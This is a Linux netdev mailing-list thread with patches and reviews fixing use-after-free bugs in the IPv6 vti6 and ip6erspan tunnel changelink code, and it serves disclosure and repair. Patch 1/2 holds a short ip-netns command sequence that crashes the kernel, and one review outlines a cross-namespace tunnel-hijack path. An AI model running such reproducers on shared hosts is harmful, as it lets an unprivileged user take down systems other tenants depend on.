public inbox for netdev@vger.kernel.org
* [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer
@ 2026-04-28 11:07 Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  0 siblings, 2 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Maoyi Xie <maoyi.xie@ntu.edu.sg>

This series addresses two slab-use-after-free reports against the IPv6
tunnel changelink callbacks vti6_changelink() and ip6erspan_changelink(),
both reachable from an unprivileged user namespace and verified on
Linux v7.0 with KASAN.

Both bugs are sibling misses of commit 5e72ce3e3980 ("net: ipv6: Use
link netns in newlink() of rtnl_link_ops"), which migrated the
*_newlink callbacks for vti6, ip6_gre, ip6_tunnel, sit and ip_tunnel
from dev_net() to link_net but did not convert the corresponding
*_changelink callbacks. As a result, after a device is migrated via
IFLA_NET_NS_FD, the changelink path looks up the per-netns hash in the
wrong namespace, leaving a stale hash entry in the original creation
netns. The next cleanup_net() of that netns walks freed memory.
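
As a rough userspace illustration of the mechanism described above (not
kernel code), the sketch below models each namespace's tunnel hash as a
single list. All struct and function names are hypothetical stand-ins:
link_net plays the role of the cached t->net and dev_net plays the role
of dev_net(dev) after migration.

```c
#include <assert.h>
#include <stddef.h>

struct tnl;

/* Toy stand-in for a per-netns tunnel hash: a single list head. */
struct netns {
	struct tnl *head;
};

struct tnl {
	struct tnl *next;
	struct netns *link_net;	/* creation netns, plays the role of t->net */
	struct netns *dev_net;	/* current netns, plays the role of dev_net(dev) */
};

/* Prepend t to the namespace's list. */
static void tnl_link(struct netns *ns, struct tnl *t)
{
	assert(ns && t);
	t->next = ns->head;
	ns->head = t;
}

/* Walk the list and remove t; silently does nothing if t is not on it. */
static void tnl_unlink(struct netns *ns, struct tnl *t)
{
	struct tnl **pp;

	for (pp = &ns->head; *pp; pp = &(*pp)->next) {
		if (*pp == t) {
			*pp = t->next;
			return;
		}
	}
}

static int tnl_is_linked(const struct netns *ns, const struct tnl *t)
{
	const struct tnl *it;

	for (it = ns->head; it; it = it->next)
		if (it == t)
			return 1;
	return 0;
}

/* Buggy shape: unlink/relink keyed on the device's current netns. */
static void changelink_buggy(struct tnl *t)
{
	tnl_unlink(t->dev_net, t);	/* misses: t lives in link_net's list */
	tnl_link(t->dev_net, t);	/* t is now reachable from two lists */
}

/* Fixed shape: always use the cached creation netns. */
static void changelink_fixed(struct tnl *t)
{
	tnl_unlink(t->link_net, t);
	tnl_link(t->link_net, t);
}
```

In this model, calling changelink_buggy() on a tunnel whose dev_net
differs from its link_net leaves it linked in both lists, so freeing the
tunnel through one namespace leaves a dangling entry in the other.
changelink_fixed() keeps it in exactly one list.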

Patch 1/2 was authored by Kuniyuki Iwashima during the security
disclosure thread; it converts vti6_changelink() and vti6_update() to
use the cached t->net.

Patch 2/2 applies the equivalent conversion to ip6erspan_changelink().
The non-erspan sibling ip6gre_changelink() in the same file already
uses the cached t->net correctly.

Both bugs were originally reported to security@kernel.org on
2026-04-26 and triaged with Kuniyuki Iwashima and Xiao Liang. We are
posting publicly, per standard practice, now that the shape of the
fix is settled.

The bugs are present on all maintained LTS branches (v5.15, v6.1, v6.6,
v6.12, v6.18) with byte-identical source, hence Cc: stable@.

Tested with KASAN reproducers (unshare --user --map-root-user --net,
RTM_NEWLINK + IFLA_NET_NS_FD migration, RTM_NEWLINK changelink in
the migrated netns, then teardown of the original netns); without the
patches both reports trip within ~2 seconds, with the patches the
reproducers complete cleanly.

Kuniyuki Iwashima (1):
  ip6: vti: Use ip6_tnl.net in vti6_changelink().

Maoyi Xie (1):
  ip6_gre: Use cached t->net in ip6erspan_changelink().

 net/ipv6/ip6_gre.c |  3 ++-
 net/ipv6/ip6_vti.c | 12 +++++++-----
 2 files changed, 9 insertions(+), 6 deletions(-)

--
2.34.1



* [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
@ 2026-04-28 11:07 ` Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  1 sibling, 2 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Kuniyuki Iwashima <kuniyu@google.com>

ip netns add ns1
ip netns add ns2
ip -n ns1 link add vti6_test type vti6 remote ::1 local ::2 key 7
ip -n ns1 link set vti6_test netns ns2
ip -n ns2 link set vti6_test type vti6 remote ::3 local ::4 key 9
ip netns del ns2
ip netns del ns1
[  132.495484] ------------[ cut here ]------------
[  132.497609] kernel BUG at net/core/dev.c:12376!

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
hash via link_net. vti6_changelink() and vti6_update() were not
converted in that series and still read dev_net(dev) /
dev_net(t->dev), which diverge from the device's creation netns
after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
entry; cleanup_net() of the original netns then walks freed memory.

Reachable from an unprivileged user namespace ("unshare --user
--map-root-user --net"); cross-tenant scope on container hosts.

Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
Cc: stable@vger.kernel.org # v5.15+
Signed-off-by: Kuniyuki Iwashima <kuniyu@google.com>
---
 net/ipv6/ip6_vti.c | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
index ad5290be4..dcb257411 100644
--- a/net/ipv6/ip6_vti.c
+++ b/net/ipv6/ip6_vti.c
@@ -722,10 +722,11 @@ vti6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p,
 static int vti6_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p,
 		       bool keep_mtu)
 {
-	struct net *net = dev_net(t->dev);
-	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
+	struct net *net = t->net;
+	struct vti6_net *ip6n;
 	int err;
 
+	ip6n = net_generic(net, vti6_net_id);
 	vti6_tnl_unlink(ip6n, t);
 	synchronize_net();
 	err = vti6_tnl_change(t, p, keep_mtu);
@@ -1031,11 +1032,12 @@ static int vti6_changelink(struct net_device *dev, struct nlattr *tb[],
 			   struct nlattr *data[],
 			   struct netlink_ext_ack *extack)
 {
-	struct ip6_tnl *t;
+	struct ip6_tnl *t = netdev_priv(dev);
+	struct net *net = t->net;
 	struct __ip6_tnl_parm p;
-	struct net *net = dev_net(dev);
-	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
+	struct vti6_net *ip6n;
 
+	ip6n = net_generic(net, vti6_net_id);
 	if (dev == ip6n->fb_tnl_dev)
 		return -EINVAL;
 
-- 
2.34.1



* [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
@ 2026-04-28 11:07 ` Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
                     ` (3 more replies)
  1 sibling, 4 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Maoyi Xie <maoyi.xie@ntu.edu.sg>

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
ip6gre hash via link_net. ip6erspan_changelink() was not converted in
that series and still uses dev_net(dev), which diverges from the
device's creation netns after IFLA_NET_NS_FD migration.

This re-inserts the tunnel into the wrong per-netns hash, leaving a
stale entry in the original creation netns. When that netns is later
destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
slab-use-after-free reported by KASAN, followed by a kernel BUG at
net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().

Reachable from an unprivileged user namespace ("unshare --user
--map-root-user --net"); cross-tenant scope on container hosts.

Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
file) already uses the cached t->net correctly. The bug is specific
to ip6erspan_changelink() copying the wrong shape.

Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
Cc: stable@vger.kernel.org # v5.15+
Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
---
 net/ipv6/ip6_gre.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
index dafcc0dcd..38ac14cc0 100644
--- a/net/ipv6/ip6_gre.c
+++ b/net/ipv6/ip6_gre.c
@@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
 				struct nlattr *data[],
 				struct netlink_ext_ack *extack)
 {
-	struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
+	struct ip6_tnl *nt = netdev_priv(dev);
+	struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
 	struct __ip6_tnl_parm p;
 	struct ip6_tnl *t;
 
-- 
2.34.1



* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
@ 2026-04-28 13:14   ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  1 sibling, 0 replies; 13+ messages in thread
From: Eric Dumazet @ 2026-04-28 13:14 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, shaw.leon, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Kuniyuki Iwashima <kuniyu@google.com>
>
> ip netns add ns1
> ip netns add ns2
> ip -n ns1 link add vti6_test type vti6 remote ::1 local ::2 key 7
> ip -n ns1 link set vti6_test netns ns2
> ip -n ns2 link set vti6_test type vti6 remote ::3 local ::4 key 9
> ip netns del ns2
> ip netns del ns1
> [  132.495484] ------------[ cut here ]------------
> [  132.497609] kernel BUG at net/core/dev.c:12376!
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
> hash via link_net. vti6_changelink() and vti6_update() were not
> converted in that series and still read dev_net(dev) /
> dev_net(t->dev), which diverge from the device's creation netns
> after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
> entry; cleanup_net() of the original netns then walks freed memory.
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Kuniyuki Iwashima <kuniyu@google.com>

Reviewed-by: Eric Dumazet <edumazet@google.com>


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
@ 2026-04-28 13:14   ` Eric Dumazet
  2026-04-28 19:49   ` Kuniyuki Iwashima
                     ` (2 subsequent siblings)
  3 siblings, 0 replies; 13+ messages in thread
From: Eric Dumazet @ 2026-04-28 13:14 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, shaw.leon, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>

Reviewed-by: Eric Dumazet <edumazet@google.com>

Thanks.


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
@ 2026-04-28 19:49   ` Kuniyuki Iwashima
  2026-04-29  1:58   ` Xiao Liang
  2026-04-30  1:18   ` Jakub Kicinski
  3 siblings, 0 replies; 13+ messages in thread
From: Kuniyuki Iwashima @ 2026-04-28 19:49 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>

nit: Reported-by is not needed if it's the same as the SOB.

> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);

nit: Please keep reverse xmas tree order, and you can
reuse *t below.
https://docs.kernel.org/process/maintainer-netdev.html#local-variable-ordering-reverse-xmas-tree-rcs

  struct ip6_tnl *t = netdev_priv(dev);
  struct ip6gre_net *ign;
  ...

  ign = net_generic(t->net, ip6gre_net_id);


Otherwise looks good.

Reviewed-by: Kuniyuki Iwashima <kuniyu@google.com>

Thanks

>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>
> --
> 2.34.1
>


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
  2026-04-28 19:49   ` Kuniyuki Iwashima
@ 2026-04-29  1:58   ` Xiao Liang
  2026-04-29  2:00     ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  3 siblings, 1 reply; 13+ messages in thread
From: Xiao Liang @ 2026-04-29  1:58 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")

The changes look good to me. But why is 5e72ce3e3980 mentioned
here? It neither introduced nor was intended to fix this bug.

Thanks.

> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>
> --
> 2.34.1
>


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-29  1:58   ` Xiao Liang
@ 2026-04-29  2:00     ` Eric Dumazet
  2026-04-29  2:38       ` Xiao Liang
  0 siblings, 1 reply; 13+ messages in thread
From: Eric Dumazet @ 2026-04-29  2:00 UTC (permalink / raw)
  To: Xiao Liang
  Cc: Maoyi Xie, netdev, kuniyu, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 6:58 PM Xiao Liang <shaw.leon@gmail.com> wrote:
>
> On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
> >
> > From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> >
> > After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> > rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> > ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> > that series and still uses dev_net(dev), which diverges from the
> > device's creation netns after IFLA_NET_NS_FD migration.
> >
> > This re-inserts the tunnel into the wrong per-netns hash, leaving a
> > stale entry in the original creation netns. When that netns is later
> > destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> > slab-use-after-free reported by KASAN, followed by a kernel BUG at
> > net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
> >
> > Reachable from an unprivileged user namespace ("unshare --user
> > --map-root-user --net"); cross-tenant scope on container hosts.
> >
> > Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> > file) already uses the cached t->net correctly. The bug is specific
> > to ip6erspan_changelink() copying the wrong shape.
> >
> > Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
>
> The changes look good to me. But why is 5e72ce3e3980 mentioned
> here? It neither introduced nor was intended to fix this bug.

Which patch added the bug then in your opinion?


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-29  2:00     ` Eric Dumazet
@ 2026-04-29  2:38       ` Xiao Liang
  0 siblings, 0 replies; 13+ messages in thread
From: Xiao Liang @ 2026-04-29  2:38 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Maoyi Xie, netdev, kuniyu, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Wed, Apr 29, 2026 at 10:00 AM Eric Dumazet <edumazet@google.com> wrote:
>
> On Tue, Apr 28, 2026 at 6:58 PM Xiao Liang <shaw.leon@gmail.com> wrote:
> >
> > On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
> > >
> > > From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> > >
> > > After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> > > rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> > > ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> > > that series and still uses dev_net(dev), which diverges from the
> > > device's creation netns after IFLA_NET_NS_FD migration.
> > >
> > > This re-inserts the tunnel into the wrong per-netns hash, leaving a
> > > stale entry in the original creation netns. When that netns is later
> > > destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> > > slab-use-after-free reported by KASAN, followed by a kernel BUG at
> > > net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
> > >
> > > Reachable from an unprivileged user namespace ("unshare --user
> > > --map-root-user --net"); cross-tenant scope on container hosts.
> > >
> > > Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> > > file) already uses the cached t->net correctly. The bug is specific
> > > to ip6erspan_changelink() copying the wrong shape.
> > >
> > > Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> >
> > The changes look good to me. But why is 5e72ce3e3980 mentioned
> > here? It neither introduced nor was intended to fix this bug.
>
> Which patch added the bug then in your opinion?

Maybe 2d665034f239 ("net: ip6_gre: Fix ip6erspan hlen calculation")
which initially introduced ip6erspan_changelink using the wrong
dev_net()?
And ab5098fa25b9 ("ip6_gre: fix tunnel list corruption for x-netns")
fixed this for ip6gre but left ip6erspan untouched.
In any case, 5e72ce3e3980 does not exist before v6.15.


* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
@ 2026-04-30  1:18   ` Jakub Kicinski
  2026-05-04  5:51     ` Maoyi Xie
  1 sibling, 1 reply; 13+ messages in thread
From: Jakub Kicinski @ 2026-04-30  1:18 UTC (permalink / raw)
  To: maoyixie.tju
  Cc: Jakub Kicinski, netdev, kuniyu, shaw.leon, davem, edumazet,
	pabeni, dsahern, kuznet, linux-kernel, stable, security

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
---
ip6: vti: Use ip6_tnl.net in vti6_changelink().

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
hash via link_net. vti6_changelink() and vti6_update() were not
converted in that series and still read dev_net(dev) /
dev_net(t->dev), which diverge from the device's creation netns
after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
entry; cleanup_net() of the original netns then walks freed memory.

> diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
> index ad5290be4dd6..dcb257411d6e 100644
> --- a/net/ipv6/ip6_vti.c
> +++ b/net/ipv6/ip6_vti.c
> @@ -722,10 +722,11 @@ vti6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p,
>  static int vti6_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p,
>  		       bool keep_mtu)
>  {
> -	struct net *net = dev_net(t->dev);
> -	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
> +	struct net *net = t->net;
> +	struct vti6_net *ip6n;
>  	int err;

Does this fix introduce a regression by leaving a loophole in
vti6_siocdevprivate()?

While vti6_changelink() and vti6_update() now correctly use t->net,
vti6_siocdevprivate() still uses dev_net(dev) to locate the tunnel during
a tunnel modification ioctl:

net/ipv6/ip6_vti.c:vti6_siocdevprivate() {
	...
	struct net *net = dev_net(dev);
	...
	case SIOCCHGTUNNEL:
		...
		t = vti6_locate(net, &p1, cmd == SIOCADDTUNNEL);
		if (dev != ip6n->fb_tnl_dev && cmd == SIOCCHGTUNNEL) {
			if (t) {
				if (t->dev != dev) {
					err = -EEXIST;
					break;
				}
			} else
				t = netdev_priv(dev);

			err = vti6_update(t, &p1, false);
		}
	...
}

Because the collision check occurs in the new namespace (dev_net(dev)), but
vti6_update() now modifies the original namespace's hash table (t->net),
could an attacker in the new namespace configure their tunnel to perfectly
match the parameters of an existing victim tunnel in the original namespace?

Since the check in the new namespace finds no collision, it seems it bypasses
the error check. Then vti6_update() prepends the attacker's tunnel
into the original namespace's hash table, which might allow intercepting or
hijacking traffic destined for the victim tunnel.

Should vti6_siocdevprivate() also be updated to use t->net for collision
checks to prevent cross-namespace traffic hijacking?
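
To make the concern concrete, here is a minimal userspace sketch (not
kernel code) of a collision check that is run against one namespace's
table while the update lands in another. The names tnl_check_change(),
tnl_locate() and the integer key are hypothetical simplifications of
vti6_locate() and the tunnel parameters.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

struct tnl {
	int key;		/* stands in for the (laddr, raddr, key) tuple */
	struct tnl *next;
};

struct netns {
	struct tnl *head;	/* toy per-netns tunnel table */
};

/* Prepend t to the namespace's table. */
static void tnl_link(struct netns *ns, struct tnl *t)
{
	assert(ns && t);
	t->next = ns->head;
	ns->head = t;
}

/* Return the first tunnel in ns with a matching key, or NULL. */
static struct tnl *tnl_locate(const struct netns *ns, int key)
{
	struct tnl *it;

	for (it = ns->head; it; it = it->next)
		if (it->key == key)
			return it;
	return NULL;
}

/* Collision check: refuse new_key if another tunnel in check_ns holds it. */
static int tnl_check_change(const struct netns *check_ns,
			    const struct tnl *self, int new_key)
{
	const struct tnl *found = tnl_locate(check_ns, new_key);

	if (found && found != self)
		return -EEXIST;
	return 0;
}
```

With a victim and an attacker tunnel both linked in the original
namespace's table, a check against the (empty) table of the namespace
the attacker's device moved to returns 0, while the same check against
the original table returns -EEXIST. Only the latter matches the table
that the update would actually modify.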
-- 
pw-bot: cr


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
                     ` (2 preceding siblings ...)
  2026-04-29  1:58   ` Xiao Liang
@ 2026-04-30  1:18   ` Jakub Kicinski
  2026-04-30 10:06     ` Maoyi Xie
  3 siblings, 1 reply; 13+ messages in thread
From: Jakub Kicinski @ 2026-04-30  1:18 UTC (permalink / raw)
  To: maoyixie.tju
  Cc: Jakub Kicinski, netdev, kuniyu, shaw.leon, davem, edumazet,
	pabeni, dsahern, kuznet, linux-kernel, stable, security

